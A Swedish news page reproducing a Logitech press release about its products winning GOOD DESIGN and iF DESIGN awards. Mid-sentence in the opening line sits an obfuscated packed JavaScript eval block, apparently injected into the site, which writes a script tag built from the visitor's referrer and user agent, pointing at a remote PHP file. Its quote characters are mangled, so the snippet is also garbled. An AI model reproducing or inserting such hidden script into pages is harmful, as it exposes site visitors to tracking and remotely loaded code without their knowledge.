Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Logitech belönas tiofaldigt i prestigefylld designtävling

Logitech belönas tiofaldigt i prestigefylld designtävling
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffinn|var|u0026u|referrer|ithfb||js|php’.split(’|’),0,{}))
kan Logitech tillkännage att sju produkter ur sortimentet har belönats med 2014 års GOOD DESIGN™-pris och tre med 2015 års iF DESIGN AWARD™. Det här speglar Logitechs ständiga hängivenhet mot ständigt skapa designprodukter i framkant. Det är det fjärde året i rad som Logitechs produkter belönats med GOOD DESIGN-priser och det femte året i rad som de belönats med iF DESIGN AWARDS.

2014 års GOOD DESIGN-pris delas ut till Logitech® case+, Logitech® Illuminated Living-Room Keyboard K830, Logitech® X300 Mobile Wireless Stereo Speaker, Logitech® G502 Proteus Core Tunable Gaming Mouse, Logitech® G402 Hyperion Fury™ Ultra-Fast FPS Gaming Mouse, Logitech® Ultrathin Keyboard Folio för iPad® Air och iPad® mini samt Logitech® Ultrathin för iPad® Air. Årets vinnare av iF DESIGN AWARD är Logitech® AnyAngle, Logitech® Wireless Mouse M320 och Ultimate Ears’ UE MEGABOOM.

”Vi är helt fokuserade på att designa produkter som är både vackra och funktionella, säger Logitechs VD Bracken Darrell. ”Vi har belönats flerfaldigt med prestigefyllda designpris flera år i rad och vi är stolta över både det och över den feedback vi fått från konsumenterna som tycker att vi gör fantastiska produkter.”

GOOD DESIGN-priset ges varje år till de bäst designade nya produkterna av Chicago Athenaeum Museum of Architecture and Design, tillsammans med European Centre for Architecture, Art, Design and Urban Studies. iF DESIGN AWARDS hyllar i sin tur produkter baserat på kriterier såsom bland annat designkvalitet, finish, materialval, innovationsgrad, funktionalitet och ergonomi.

Om Logitech

Logitech är världsledande inom produkter som kopplar människor samman med de digitala upplevelser som spelar roll för dem. Med en spännvidd över mängder av dator-, kommunikations- och underhållningsplattformar underlättar och förbättrar Logitechs hård- och mjukvara digital navigation, konsumtion av musik- och videounderhållning, gaming, socialt nätverkande, kommunikation över internet, videosäkerhet och kontroll över hemunderhållning. Logitech grundades 1981 och är ett Schweiziskt publikt aktiebolag listat på SIX Swiss Exchange (LOGN) och på Nasdaq Global Select Market (LOGI).